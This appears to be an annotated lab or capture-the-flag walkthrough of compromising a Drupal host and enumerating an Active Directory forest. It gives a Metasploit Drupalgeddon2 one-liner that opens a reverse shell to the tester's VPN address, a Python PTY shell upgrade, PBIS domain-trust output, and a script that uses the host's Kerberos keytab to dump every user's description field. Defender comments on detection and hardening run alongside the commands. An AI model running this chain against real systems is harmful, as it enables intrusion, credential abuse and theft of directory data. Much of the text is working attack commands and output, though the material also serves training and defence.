# Run Metasploit non-interactively (-q: no banner, -x: execute the quoted
# command string) against the Drupal host at 10.9.15.11 and catch the
# resulting reverse shell on the VPN interface (LHOST tun0, LPORT 8081).
# Defender view: the observable on the target is the web-server process
# (www-data, see the prompt below) opening an outbound connection to a
# non-HTTP port on a VPN client address — a process-tree/egress alert, plus
# patching the Drupal install, is the mitigation.
# NOTE(review): 8081 is an unprivileged port and tun0 needs no root to use as
# a source address, so sudo is presumably unnecessary here — confirm before
# running msfconsole as root (least privilege on the attacker box too).
sudo msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS 10.9.15.11; set LHOST tun0; set LPORT 8081; exploit"
Upgrading the Shell
# Upgrade the bare reverse shell to a PTY-backed bash: pty.spawn runs
# /bin/bash with stdin/stdout attached to a pseudo-terminal, so interactive
# prompts and job control behave. Run inside the existing shell, not from
# a script, or the spawned bash has no terminal to talk to.
# Defender view: a python3 process whose child is a bash on a freshly
# allocated pty, all under www-data, is an unusual shape worth alerting on.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Read the Kerberos client configuration to see which realm and KDCs the host
# is joined to (the PBIS status below reports CORE.CYBER.LOCAL / coredc).
# Hardening note: krb5.conf itself is normally world-readable by design; the
# sensitive file on a joined host is the keytab (/etc/krb5.keytab, used further
# down), which should be readable by root only.
cat /etc/krb5.conf
Using PBIS tools
www-data@corewebdl:/opt/pbis/bin$ ./get-status
LSA Server Status:

Compiled daemon version: 8.8.0.506
Packaged product version: 8.8.506.0
Uptime: 0 days 4 hours 56 minutes 27 seconds

[Authentication provider: lsa-activedirectory-provider]

    Status: Online
    Mode: Un-provisioned
    Domain: CORE.CYBER.LOCAL
    Domain SID: S-1-5-21-1559563558-3652093953-1250159885
    Forest: cyber.local
    Site: core
    Online check interval: 300 seconds
    [Trusted Domains: 5]

    [Domain: core]
        DNS Domain: core.cyber.local
        Netbios name: core
        Forest name: cyber.local
        Trustee DNS name:
        Client site name: core
        Domain SID: S-1-5-21-1559563558-3652093953-1250159885
        Domain GUID: 00000000-0000-0000-0000-000000000000
        Trust Flags: [0x0019]
            [0x0001 - In forest]
            [0x0008 - Primary]
            [0x0010 - Native]
        Trust type: Up Level
        Trust Attributes: [0x0000]
        Trust Direction: Primary Domain
        Trust Mode: In my forest Trust (MFT)
        Domain flags: [0x0001]
            [0x0001 - Primary]
        [Domain Controller (DC) Information]
            DC Name: coredc.core.cyber.local
            DC Address: 10.9.15.10
            DC Site: core
            DC Flags: [0x0003f3fd]
            DC Is PDC: yes
            DC is time server: yes
            DC has writeable DS: yes
            DC is Global Catalog: yes
            DC is running KDC: yes
        [Global Catalog (GC) Information]
            GC Name: coredc.core.cyber.local
            GC Address: 10.9.15.10
            GC Site: core
            GC Flags: [0x0003f3fd]
            GC Is PDC: yes
            GC is time server: yes
            GC has writeable DS: yes
            GC is running KDC: yes

    [Domain: CYBER]
        DNS Domain: cyber.local
        Netbios name: CYBER
        Forest name: cyber.local
        Trustee DNS name: CORE.CYBER.LOCAL
        Client site name: Core
        Domain SID: S-1-5-21-2011815209-557191040-1566801441
        Domain GUID: 00000000-0000-0000-0000-000000000000
        Trust Flags: [0x0027]
            [0x0001 - In forest]
            [0x0002 - Outbound]
            [0x0004 - Tree root]
            [0x0020 - Inbound]
        Trust type: Up Level
        Trust Attributes: [0x0020]
            [0x0020 - Within forest]
        Trust Direction: Twoway Trust
        Trust Mode: In my forest Trust (MFT)
        Domain flags: [0x0000]
        [Domain Controller (DC) Information]
            DC Name: cydc.cyber.local
            DC Address: 10.9.10.10
            DC Site: Root
            DC Flags: [0x0003f37d]
            DC Is PDC: yes
            DC is time server: yes
            DC has writeable DS: yes
            DC is Global Catalog: yes
            DC is running KDC: yes
        [Global Catalog (GC) Information]
            GC Name: coredc.core.cyber.local
            GC Address: 10.9.15.10
            GC Site: core
            GC Flags: [0x0003f3fd]
            GC Is PDC: yes
            GC is time server: yes
            GC has writeable DS: yes
            GC is running KDC: yes

    [Domain: D3V]
        DNS Domain: d3v.local
        Netbios name: D3V
        Forest name: d3v.local
        Trustee DNS name: cyber.local
        Client site name: Default-First-Site-Name
        Domain SID: S-1-5-21-1741135793-2392241712-4132009386
        Domain GUID: 00000000-0000-0000-0000-000000000000
        Trust Flags: [0x0022]
            [0x0002 - Outbound]
            [0x0020 - Inbound]
        Trust type: Up Level
        Trust Attributes: [0x0008]
            [0x0008 - Forest transitive]
        Trust Direction: Twoway Trust
        Trust Mode: In other forest Trust (OFT)
        Domain flags: [0x0000]
        [Domain Controller (DC) Information]
            DC Name: d3dc.d3v.local
            DC Address: 10.9.30.10
            DC Site: Default-First-Site-Name
            DC Flags: [0x0003f3fd]
            DC Is PDC: yes
            DC is time server: yes
            DC has writeable DS: yes
            DC is Global Catalog: yes
            DC is running KDC: yes

    [Domain: M3C]
        DNS Domain: m3c.local
        Netbios name: M3C
        Forest name: m3c.local
        Trustee DNS name: cyber.local
        Client site name: Default-First-Site-Name
        Domain SID: S-1-5-21-340507432-2615605230-720798708
        Domain GUID: 00000000-0000-0000-0000-000000000000
        Trust Flags: [0x0020]
            [0x0020 - Inbound]
        Trust type: Up Level
        Trust Attributes: [0x0008]
            [0x0008 - Forest transitive]
        Trust Direction: Zeroway Trust
        Trust Mode: In other forest Trust (OFT)
        Domain flags: [0x0000]
        [Domain Controller (DC) Information]
            DC Name: m3dc.m3c.local
            DC Address: 10.9.20.10
            DC Site: Default-First-Site-Name
            DC Flags: [0x0001f3fd]
            DC Is PDC: yes
            DC is time server: yes
            DC has writeable DS: yes
            DC is Global Catalog: yes
            DC is running KDC: yes

    [Domain: inception]
        DNS Domain: inception.local
        Netbios name: inception
        Forest name: inception.local
        Trustee DNS name: cyber.local
        Client site name: Default-First-Site-Name
        Domain SID: S-1-5-21-3923830851-530095044-3265323199
        Domain GUID: 00000000-0000-0000-0000-000000000000
        Trust Flags: [0x0022]
            [0x0002 - Outbound]
            [0x0020 - Inbound]
        Trust type: Up Level
        Trust Attributes: [0x0008]
            [0x0008 - Forest transitive]
        Trust Direction: Twoway Trust
        Trust Mode: In other forest Trust (OFT)
        Domain flags: [0x0000]
        [Domain Controller (DC) Information]
            DC Name: indc.inception.local
            DC Address: 10.9.40.5
            DC Site: Default-First-Site-Name
            DC Flags: [0x0003f3fd]
            DC Is PDC: yes
            DC is time server: yes
            DC has writeable DS: yes
            DC is Global Catalog: yes
            DC is running KDC: yes
Using adtool on Linux
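#!/usr/bin/env bash
# List every user object the joined host can see and print each one's
# "description" attribute, authenticating as the machine account with the host
# keytab. Run from /opt/pbis/bin (hence ./adtool), as in the prompt above.
#
# Why this differs from the one-liner it replaces: the loop used a bare
# `read line`, which strips backslashes and leading whitespace — a DN such as
# "CN=Doe\, John,OU=..." would be corrupted before the lookup. `IFS= read -r`
# keeps the DN byte-for-byte; printf replaces echo so a DN is never
# misinterpreted as an echo option.
#
# Defender notes: the credential here is /etc/krb5.keytab. If it is readable by
# the web-server account (www-data on this host), anyone who compromises the
# web app can enumerate the directory as COREWEBDL$ — restrict the keytab to
# root, and treat user "description" fields as public (never park passwords or
# notes there). On the DC this activity appears as one LDAP bind and one lookup
# per user from the COREWEBDL$ machine account within a short burst, which is
# a reasonable detection signature for a non-interactive machine account.
keytab=/etc/krb5.keytab
separator='======================'

./adtool -a search-user --name 'CN=*' --keytab="$keytab" -n 'COREWEBDL$' \
  | grep -- "CN" \
  | while IFS= read -r dn; do
      printf '%s\n' "$dn" \
        && ./adtool --keytab="$keytab" -n 'COREWEBDL$@CORE.CYBER.LOCAL' \
             -a lookup-object --dn="$dn" --attr "description" \
        && printf '%s\n' "$separator"
    done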